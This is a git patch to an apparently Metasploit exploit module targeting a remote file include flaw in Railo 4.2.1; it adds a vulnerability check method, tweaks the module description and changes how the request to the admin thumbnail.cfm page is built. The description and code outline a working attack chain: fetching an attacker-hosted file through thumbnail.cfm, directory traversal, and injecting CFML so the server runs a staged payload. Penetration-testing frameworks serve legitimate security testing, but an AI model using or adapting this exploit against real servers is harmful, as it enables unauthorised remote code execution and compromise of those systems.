From ee3e5c91596023d167e642b6b8ffb46fea3237d3 Mon Sep 17 00:00:00 2001 From: Brandon Perry Date: Tue, 2 Sep 2014 21:35:47 -0500 Subject: [PATCH] Add check method --- modules/exploits/linux/http/railo_cfml_rfi.rb | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index 407f32c8fb..5a902db02e 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -17,10 +17,10 @@ class Metasploit4 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable - line in thumbnail.cfm allows an attacker to download an - arbitrary PNG file. By appending a .cfm and taking advantage of + line in thumbnail.cfm allows an atacker to download an + arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup - to the PNG file and have it interpreted by the server. This is + to the PNG file, and have it interpreted by the server. This is used to stage and execute a fully-fledged payload. }, 'License' => MSF_LICENSE, @@ -63,6 +63,13 @@ class Metasploit4 < Msf::Exploit::Remote end def check + res = send_request_cgi({ + 'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm') + }) + + return Exploit::CheckCode::Appears if res and res.code == 200 + + return Exploit::CheckCode::Safe end def exploit @@ -92,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote wh = '5000' #width and height res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'), + 'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'), 'vars_get' => { 'img' => url + '/' + stager_name, 'height' => wh,